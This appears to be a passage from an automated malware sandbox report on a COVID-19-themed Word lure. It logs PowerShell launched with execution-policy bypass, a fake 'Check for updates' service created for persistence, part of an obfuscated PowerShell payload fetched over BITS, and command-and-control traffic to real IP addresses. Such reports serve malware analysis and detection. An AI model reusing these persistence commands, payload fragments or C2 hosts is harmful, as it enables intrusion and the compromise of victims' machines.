                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Jan 20, 2021 10:31:45.642548084 CET256OUTGET /s34987435987.txt HTTP/1.1
                  Connection: Keep-Alive
                  Accept: */*
                  Accept-Encoding: identity
                  If-Unmodified-Since: Wed, 23 Dec 2020 13:46:16 GMT
                  User-Agent: Microsoft BITS/7.8
                  Host: 78.141.194.181
                  Jan 20, 2021 10:31:45.693434954 CET258INHTTP/1.1 200 OK
                  Date: Wed, 20 Jan 2021 09:31:45 GMT
                  Server: Apache/2.4.25 (Debian)
                  Last-Modified: Wed, 23 Dec 2020 13:46:16 GMT
                  ETag: "12932-5b721ea4eff8d"
                  Accept-Ranges: bytes
                  Content-Length: 76082
                  Vary: Accept-Encoding
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/plain
                  Data Raw: 53 65 74 2d 53 74 72 69 63 74 4d 6f 64 65 20 2d 56 65 72 73 69 6f 6e 20 32 0a 66 75 6e 63 74 69 6f 6e 20 73 49 5a 55 0a 7b 0a 24 42 69 59 4b 3d 4a 71 4b 4b 50 5a 20 27 37 27 0a 24 42 69 59 4b 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 64 44 4a 42 59 0a 7b 0a 24 56 70 73 53 59 62 3d 41 78 4b 65 6d 44 20 41 20 76 20 68 20 65 20 54 20 55 20 54 20 49 0a 24 4d 6d 35 6d 49 56 3d 6f 58 6b 65 4a 20 46 20 63 20 27 32 27 20 71 0a 24 4c 32 74 6d 36 32 3d 41 55 76 78 6f 20 71 20 2b 20 4f 20 74 20 43 20 39 20 55 20 79 20 57 0a 24 4c 32 74 6d 36 32 2b 24 56 70 73 53 59 62 2b 24 4d 6d 35 6d 49 56 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 51 41 51 41 0a 7b 0a 50 61 72 61 6d 20 28 24 77 4c 38 7a 49 46 2c 24 51 66 4d 2c 24 75 79 67 31 2c 24 7a 6d 78 2c 24 66 52 4c 4e 65 53 2c 24 54 45 56 7a 29 0a 24 77 4c 38 7a 49 46 2b 24 75 79 67 31 2b 24 66 52 4c 4e 65 53 2b 24 7a 6d 78 2b 24 54 45 56 7a 2b 24 51 66 4d 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 78 4e 6b 71 6e 49 0a 7b 0a 24 51 6c 77 3d 45 53 59 63 71 20 71 20 55 20 63 0a 24 4a 54 51 3d 69 64 6d 77 20 41 20 65 20 55 20 63 20 6c 20 5a 20 44 20 41 20 58 20 50 20 2f 0a 24 4b 71 65 61 75 68 3d 46 76 41 57 63 20 49 20 57 20 43 20 54 0a 24 54 78 51 6a 57 3d 67 77 6d 79 63 20 55 20 69 20 31 20 2b 20 4f 20 2f 20 7a 20 4f 20 66 20 49 0a 24 47 74 4b 33 34 3d 65 59 75 62 47 20 43 20 6d 20 77 20 6a 20 79 20 77 20 74 20 7a 20 32 20 57 20 6c 20 70 20 42 20 49 0a 24 72 4a 73 72 4b 4d 3d 5a 79 4a 4c 69 62 20 53 20 66 20 45 0a 24 4e 65 35 6f 3d 6f 59 61 74 53 20 2f 20 59 20 57 20 43 20 58 20 73 20 54 20 53 20 75 20 48 20 66 20 74 20 36 0a 24 70 77 4e 77 38 70 3d 4c 6f 68 44 20 56 20 42 20 4b 20 4b 20 52 20 41 20 61 0a 24 4e 65 35 6f 2b 24 54 78 51 6a 57 2b 24 72 4a 73 72 4b 4d 2b 24 47 74 4b 33 34 2b 24 70 77 4e 77 38 70 2b 24 4b 71 65 61 75 68 2b 24 4a 54 51 2b 24 51 6c 77 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 51 75 75 51 77 77 0a 7b 0a 24 66 59 6d 42 70 3d 6f 59 61 74 53 20 6c 20 65 20 6c 20 44 20 64 20 65 20 63 20 74 20 65 20 65 20 52 20 66 20 65 0a 24 43 36 76 79 3d 5a 79 4a 4c 69 62 20 61 20 74 20 67 0a 24 5a 30 70 4e 76 3d 4a 71 4b 4b 50 5a 20 65 0a 24 66 59 6d 42 70 2b 24 43 36 76 79 2b 24 5a 30 70 4e 76 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 52 6a 56 72 0a 7b 0a 24 6c 69 68 76 77 58 3d 6a 5a 50 50 6d 20 63 0a 24 6c 69 68 76 77 58 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 7a 51 67 4d 66 67 0a 7b 0a 24 47 61 74 72 48 78 3d 6c 53 78 75 20 51 20 62 20 41 20 41 20 36 20 69 20 42 20 39 20 32 0a 24 6c 74 31 3d 64 74 55 43 6e 51 20 74 20 4a 20 65 20 6f 20 47 20 6d 20 7a 0a 24 46 79 53 3d 4a 71 4b 4b 50 5a 20 56 0a 24 46 49 41 39 3d 6f 58 6b 65 4a 20 51 20 55 20 67 20 55 0a 24 46 49 41 39 2b 24 6c 74 31 2b 24 47 61 74 72 48 78 2b 24 46 79 53 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 69 57 4c 76 67 0a 7b 0a 24 56 34 49 59 3d 6c 53 78 75 20 52 20 53 20 4b 20 48 20 5a 20 38 20 47 20 57 20 38 0a 24 4b 55 39 33 36 49 3d 57 49 57 51 4f 75 20 56 20 50 20 75 20 66 20 6e 20 73 20 32 20 6b 20 64 20 64 20 56 20 42 20 6d 20 79 0a 24 50 6f 52 44 53 66 3d 5a 79 4a 4c 69 62 20 75 20 37 20 72 0a 24 47 47 59 55 3d 4a 72 56 72 47 20 41 20 46 20 35 20 41 20 2b
                  Data Ascii: Set-StrictMode -Version 2function sIZU{$BiYK=JqKKPZ '7'$BiYK}function dDJBY{$VpsSYb=AxKemD A v h e T U T I$Mm5mIV=oXkeJ F c '2' q$L2tm62=AUvxo q + O t C 9 U y W$L2tm62+$VpsSYb+$Mm5mIV}function QAQA{Param ($wL8zIF,$QfM,$uyg1,$zmx,$fRLNeS,$TEVz)$wL8zIF+$uyg1+$fRLNeS+$zmx+$TEVz+$QfM}function xNkqnI{$Qlw=ESYcq q U c$JTQ=idmw A e U c l Z D A X P /$Kqeauh=FvAWc I W C T$TxQjW=gwmyc U i 1 + O / z O f I$GtK34=eYubG C m w j y w t z 2 W l p B I$rJsrKM=ZyJLib S f E$Ne5o=oYatS / Y W C X s T S u H f t 6$pwNw8p=LohD V B K K R A a$Ne5o+$TxQjW+$rJsrKM+$GtK34+$pwNw8p+$Kqeauh+$JTQ+$Qlw}function QuuQww{$fYmBp=oYatS l e l D d e c t e e R f e$C6vy=ZyJLib a t g$Z0pNv=JqKKPZ e$fYmBp+$C6vy+$Z0pNv}function RjVr{$lihvwX=jZPPm c$lihvwX}function zQgMfg{$GatrHx=lSxu Q b A A 6 i B 9 2$lt1=dtUCnQ t J e o G m z$FyS=JqKKPZ V$FIA9=oXkeJ Q U g U$FIA9+$lt1+$GatrHx+$FyS}function iWLvg{$V4IY=lSxu R S K H Z 8 G W 8$KU936I=WIWQOu V P u f n s 2 k d d V B m y$PoRDSf=ZyJLib u 7 r$GGYU=JrVrG A F 5 A +
                  Jan 20, 2021 10:31:45.693483114 CET259INData Raw: 20 6e 20 48 20 62 20 68 20 53 20 69 20 4b 20 79 20 27 37 27 20 4c 0a 24 6e 68 6d 3d 62 78 59 66 6b 65 20 2b 20 75 20 49 0a 24 48 77 32 3d 76 78 4a 54 20 71 20 55 20 39 20 7a 20 66 20 27 31 27 20 4e 20 4d 20 66 20 41 20 62 20 65 20 6a 20 64 20 44
                  Data Ascii: n H b h S i K y '7' L$nhm=bxYfke + u I$Hw2=vxJT q U 9 z f '1' N M f A b e j d D D$Hw2+$V4IY+$KU936I+$GGYU+$nhm+$PoRDSf}function SXLi{$XecFNk=xZHq v R u y y Q k P J O$J70n=LohD S B o N L Z k$GWYJq=ESYcq b I O$pyL=ksNR '2' Z X$nbFqW=
                  Jan 20, 2021 10:31:45.693521023 CET260INData Raw: 5a 52 33 6a 2b 24 48 4b 48 4b 54 2b 24 70 70 6e 30 54 6a 2b 24 41 65 45 64 35 2b 24 56 50 74 65 2b 24 49 52 48 55 2b 24 73 45 53 67 2b 24 7a 77 7a 2b 24 64 34 33 69 2b 24 6c 4f 4c 2b 24 49 4a 76 2b 24 67 4c 63 52 2b 24 62 5a 45 53 31 38 0a 7d 0a
                  Data Ascii: ZR3j+$HKHKT+$ppn0Tj+$AeEd5+$VPte+$IRHU+$sESg+$zwz+$d43i+$lOL+$IJv+$gLcR+$bZES18}function eksSQ{$pfxUH=rdFg H$E2ynlB=gwmyc G T e r o y 6 9 j L$rNvHjf=itwaMH y 8 K h u b$E2ynlB+$rNvHjf+$pfxUH}function BCqQU{$tuYC2=XsenO z O 2 w O 8 J
                  Jan 20, 2021 10:31:45.693572998 CET262INData Raw: 65 0a 24 44 4d 73 3d 46 76 41 57 63 20 38 20 76 20 54 20 55 0a 24 71 79 6d 31 3d 6f 64 48 73 65 20 75 20 64 20 2b 20 68 20 68 0a 24 6f 43 68 33 3d 41 55 76 78 6f 20 36 20 2f 20 69 20 75 20 69 20 68 20 71 20 49 20 49 0a 24 43 47 6c 46 74 52 3d 44
                  Data Ascii: e$DMs=FvAWc 8 v T U$qym1=odHse u d + h h$oCh3=AUvxo 6 / i u i h q I I$CGlFtR=DqVz '6' C + L a i S N$vFEfG=ZyJLib e 1 '8'$VbI=itwaMH C X z P P '5'$c1RmH+$RfqS+$Q3Vcx+$qym1+$VbI+$yt3+$n260b+$CGlFtR+$KgUA+$g0H+$oCh3+$xwn+$DMs+$vFEfG+$Nz61P
                  Jan 20, 2021 10:31:45.693612099 CET263INData Raw: 33 20 41 20 30 20 4e 20 5a 20 30 20 42 20 49 20 71 20 57 0a 24 5a 33 56 36 53 4a 2b 24 55 75 77 72 2b 24 43 57 30 2b 24 72 63 76 49 4f 2b 24 79 74 5a 37 55 4d 2b 24 67 4c 73 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 66 74 58 4a 48 0a 7b 0a 50 61 72 61
                  Data Ascii: 3 A 0 N Z 0 B I q W$Z3V6SJ+$Uuwr+$CW0+$rcvIO+$ytZ7UM+$gLs}function ftXJH{Param ($Rcr2J,$SQA,$qxf,$EKTcB,$WY0YEu,$Q4pR,$ros,$gD2,$JBpoCz,$zqwod,$x9f,$IxK4S2,$eDL)$IxK4S2+$Q4pR+$Rcr2J+$EKTcB+$eDL+$WY0YEu+$x9f+$zqwod+$JBpoCz+$ros+$SQA+$qxf+
                  Jan 20, 2021 10:31:45.693643093 CET264INData Raw: 30 20 48 20 6b 0a 24 43 64 4b 34 3d 46 76 41 57 63 20 62 20 2b 20 56 20 64 0a 24 68 6f 65 47 3d 63 56 7a 72 4e 45 20 6c 20 2f 20 59 20 36 20 34 0a 24 48 31 48 3d 63 6d 45 4b 70 20 2f 20 47 20 56 20 6d 20 72 20 6c 20 55 20 57 20 56 20 68 20 72 20
                  Data Ascii: 0 H k$CdK4=FvAWc b + V d$hoeG=cVzrNE l / Y 6 4$H1H=cmEKp / G V m r l U W V h r o F$ZDH3gO=ESYcq n '5' 6$YMax=AUvxo b 2 f Y G p 4 p V$y5Sb=vxJT o c m y 7 t p F 6 N w 3 w z E m$B3d=cmEKp p 9 y a / t M W Q 9 9 X q$pOP=ksNR x f 8$OLv2b=ES
                  Jan 20, 2021 10:31:45.693695068 CET266INData Raw: 20 44 0a 24 73 53 57 3d 6f 58 6b 65 4a 20 34 20 67 20 55 20 4c 0a 24 6c 6a 55 63 53 77 2b 24 73 53 57 2b 24 4e 43 41 74 4d 78 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 76 4b 6b 79 57 0a 7b 0a 24 49 6c 6b 7a 69 54 3d 6c 66 79 57 20 51 20 4b 20 75 20 64
                  Data Ascii: D$sSW=oXkeJ 4 g U L$ljUcSw+$sSW+$NCAtMx}function vKkyW{$IlkziT=lfyW Q K u d / E U s L '1' m 7 T D$HJsWl=gpHdkl 2 T g t K 7 E r R k$nTYc1o=AUvxo i N '3' B f 0 b L O$kryl=lsWiVS 3 j L F K k F t K 3 g H N$ROAs5=EBdZ c K K 8 E i$QKB=ks
                  Jan 20, 2021 10:31:45.693743944 CET267INData Raw: 0a 24 55 69 48 59 4e 3d 6f 58 6b 65 4a 20 6f 20 62 20 78 20 70 0a 24 48 52 33 3d 58 43 6a 65 65 20 2b 20 4f 20 38 20 55 20 72 20 49 20 48 20 75 0a 24 41 54 37 36 5a 50 3d 6f 59 61 74 53 20 31 20 47 20 53 20 4a 20 42 20 76 20 42 20 76 20 6d 20 6d
                  Data Ascii: $UiHYN=oXkeJ o b x p$HR3=XCjee + O 8 U r I H u$AT76ZP=oYatS 1 G S J B v B v m m j M X$BSBvs=ZqSlH 4 F$uYLV=XsenO l 7 B L M H C F d h g c W y u$nUQ0=gOqWaD S '7' 1 k A p l 1 l$mXJ9e=ZyJLib q C Q$nUQ0+$HR3+$gEr7+$AT76ZP+$UiHYN+$mXJ9e+$dC
                  Jan 20, 2021 10:31:45.693782091 CET269INData Raw: 42 4a 6e 4d 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 67 6a 54 74 65 41 0a 7b 0a 24 4c 62 7a 58 4f 3d 77 7a 6d 54 62 75 20 56 20 27 20 27 20 27 2c 27 20 6c 20 74 20 75 20 72 20 61 20 6f 20 69 20 74 0a 24 69 37 35 42 3d 67 77 6d 79 63 20 6c 20 27 2c 27
                  Data Ascii: BJnM}function gjTteA{$LbzXO=wzmTbu V ' ' ',' l t u r a o i t$i75B=gwmyc l ',' ' ' i e w g N S S$tGkDEx=ixklhM B d y e$jAorn=gpHdkl l u i ',' P b H ' ' i c$jAorn+$tGkDEx+$i75B+$LbzXO}function qzmcmC{Param ($e4qb,$Jue)$N6kC=mixr$a1
                  Jan 20, 2021 10:31:45.693829060 CET270INData Raw: 66 75 6e 63 74 69 6f 6e 20 6e 4b 6d 46 66 4c 0a 7b 0a 5a 79 4a 4c 69 62 20 28 55 6d 52 64 29 20 28 4d 75 43 4e 4a 6d 29 20 28 56 59 5a 57 45 29 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 71 6b 56 64 75 0a 7b 0a 24 64 46 53 3d 57 49 57 51 4f 75 20 2f 20
                  Data Ascii: function nKmFfL{ZyJLib (UmRd) (MuCNJm) (VYZWE)}function qkVdu{$dFS=WIWQOu / h n '4' 6 d 8 3 8 w j j Y G$Fna=DMxuZM I x G M Y 2 F Y$TU6k=wzmTbu P O P 8 T / G L '9' H 4$Qc00rd=fJlxX N K o p /$s1Hlwt=gwmyc 2 G x k y v 3 o Z R$wnsU5n=lS
                  Jan 20, 2021 10:31:45.693866968 CET271INData Raw: 72 6f 29 0a 24 66 72 6c 3d 6d 68 71 70 5a 4a 0a 24 50 6d 6d 3d 24 66 72 6c 2e 49 6e 76 6f 6b 65 28 24 62 4d 79 6d 75 2c 20 30 78 66 66 66 66 66 66 66 66 29 20 7c 20 4f 75 74 2d 4e 75 6c 6c 0a 7d 0a 66 75 6e 63 74 69 6f 6e 20 4e 74 41 6f 6d 78 0a
                  Data Ascii: ro)$frl=mhqpZJ$Pmm=$frl.Invoke($bMymu, 0xffffffff) | Out-Null}function NtAomx{$ygg=Bvph P k N l s T p M X 2 2 W$fOMUC=uJEn d k g 6 A c W$LkWOq=odHse x 4 J l 2$F2Rov=JrVrG G Y k 0 s j k A x j W Z E Y o$Mlv7L=arbw '1' j k 4 D k D E h$


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.44972445.67.229.12580C:\Windows\SysWOW64\svchost.exe
                  TimestampkBytes transferredDirectionData
                  Jan 20, 2021 10:32:26.612793922 CET336OUTGET /c7mnnlrmfut6g1erfewlxlxniyo.php HTTP/1.1
                  Host: 45.67.229.125
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                  Accept: */*
                  Jan 20, 2021 10:32:26.695453882 CET336INHTTP/1.1 200 OK
                  Server: Apache
                  Date: Wed, 20 Jan 2021 01:32:26 GMT
                  Connection: Keep-Alive
                  Jan 20, 2021 10:32:26.816546917 CET337INData Raw: 38 62 78 d6 8a c6 5a
                  Data Ascii: 8bxZ
                  Jan 20, 2021 10:32:26.818500996 CET337OUTData Raw: 38 62 79 d7
                  Data Ascii: 8by
                  Jan 20, 2021 10:32:26.936434984 CET337OUTData Raw: 8a c7
                  Data Ascii:
                  Jan 20, 2021 10:32:27.013551950 CET337INData Raw: 7c 18 87 83
                  Data Ascii: |
                  Jan 20, 2021 10:32:27.168299913 CET337INData Raw: 4d 66 5d ef e5 99 06 86 ab c5 f8 88 63 15 3e e6 03 3d
                  Data Ascii: Mf]c>=
                  Jan 20, 2021 10:32:27.346507072 CET337OUTData Raw: 5a 7c 0b 87
                  Data Ascii: Z|
                  Jan 20, 2021 10:32:27.483310938 CET338OUTData Raw: 94 4d 62 5d 2d 85 51 0f 45 58 9f ff 89 24 1f 75 8b 36
                  Data Ascii: Mb]-QEX$u6
                  Jan 20, 2021 10:32:27.561248064 CET338INData Raw: 52 93 18 da
                  Data Ascii: R
                  Jan 20, 2021 10:32:27.679847956 CET338INData Raw: a6 fc 0e 44 37 26 e9 d4 71 d8 44 46 df 52 30 64 23 b3 a8 7c 69 68 e0 2a 06 9b bd 76 3a 72 44 02 07 fd dd c1 b7 c8 ae 67 97 41 99 a1 0e 08 2b dd 60 97 9f 0d 88 b7 6f 01 52 9e 82 c3 2b e9 72 9e 6d 7b ba 76 65 be 4b 43 90 fc 75 01 c0 f4 f5 c6 42 62
                  Data Ascii: D7&qDFR0d#|ih*v:rDgA+`oR+rm{veKCuBbJzh|q]6!Zr,n6$,+MF=40XD[{[gL,c
                  Jan 20, 2021 10:32:27.834860086 CET339OUTData Raw: 3f 02 87 ae
                  Data Ascii: ?
                  Jan 20, 2021 10:32:27.967499971 CET339OUTData Raw: 32 fd fe 1b 4f 26 39 f9 ad 7e db 42 2b a7 64 35 43 2e 98 88 2e 4b 33 eb 3c 13 e9 83 76 7a 71 58 49 54 9f 9e c9 a6 fc ba 72 cb 3c af aa 06 1b 64 cf 05 b0 9d 79 87 ae 3b 48 01 a9 9d c9 32 9d 56 c0 1e 5d ab 67 69 ca 05 26 9b e8 31 54 c7 8e c3 c6 4f
                  Data Ascii: 2O&9~B+d5C..K3<vzqXITr<dy;H2V]gi&1TO{]ZNE7tAW+UP{>soB;UT*6m%'=-~ytFZy[~4=c,a{QqVLw'LLB?Vg<a<a2(B_P.z|^~03


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.449725216.239.32.2180C:\Windows\SysWOW64\svchost.exe
                  TimestampkBytes transferredDirectionData
                  Jan 20, 2021 10:32:27.680223942 CET338OUTGET // HTTP/1.1
                  Host: ifconfig.me
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
                  Accept: */*
                  Connection: close
                  Jan 20, 2021 10:32:27.831789970 CET339INHTTP/1.1 302 Found
                  Date: Wed, 20 Jan 2021 09:32:27 GMT
                  Content-Type: text/plain; charset=utf-8
                  Content-Length: 43
                  Access-Control-Allow-Origin: *
                  Location: https://ifconfig.me//
                  Vary: Accept
                  Via: 1.1 google
                  Connection: close
                  Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 69 66 63 6f 6e 66 69 67 2e 6d 65 2f 2f
                  Data Ascii: Found. Redirecting to https://ifconfig.me//


                  Code Manipulations

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Start time:10:30:42
                  Start date:20/01/2021
                  Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  Wow64 process (32bit):true
                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                  Imagebase:0x3c0000
                  File size:1937688 bytes
                  MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:30:46
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
                  Imagebase:0x3e0000
                  File size:147456 bytes
                  MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000001.00000003.656718758.0000000005DD3000.00000004.00000040.sdmp, Author: Florian Roth
                  Reputation:high

                  General

                  Start time:10:30:47
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1
                  Imagebase:0x1000000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:high

                  General

                  Start time:10:30:48
                  Start date:20/01/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:08
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1
                  Imagebase:0x1000000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.793327668.000000000469F000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.789971993.0000000000B70000.00000004.00000020.sdmp, Author: Florian Roth
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000003.740498295.0000000000BE4000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmp, Author: Florian Roth
                  Reputation:high

                  General

                  Start time:10:31:08
                  Start date:20/01/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:41
                  Start date:20/01/2021
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Imagebase:0x7ff6eb840000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:45
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\system32\cmd.exe' /C sc delete checkupdate
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:45
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\sc.exe
                  Wow64 process (32bit):true
                  Commandline:sc delete checkupdate
                  Imagebase:0xb80000
                  File size:60928 bytes
                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:10:31:46
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:46
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\sc.exe
                  Wow64 process (32bit):true
                  Commandline:sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates'
                  Imagebase:0xb80000
                  File size:60928 bytes
                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:10:31:47
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Windows\system32\cmd.exe' /C sc start checkupdate
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:47
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\sc.exe
                  Wow64 process (32bit):true
                  Commandline:sc start checkupdate
                  Imagebase:0xb80000
                  File size:60928 bytes
                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  General

                  Start time:10:31:47
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:48
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
                  Imagebase:0x11d0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Start time:10:31:48
                  Start date:20/01/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff724c50000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  General

                  Start time:10:31:48
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1
                  Imagebase:0x1000000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET

                  General

                  Start time:10:32:24
                  Start date:20/01/2021
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs
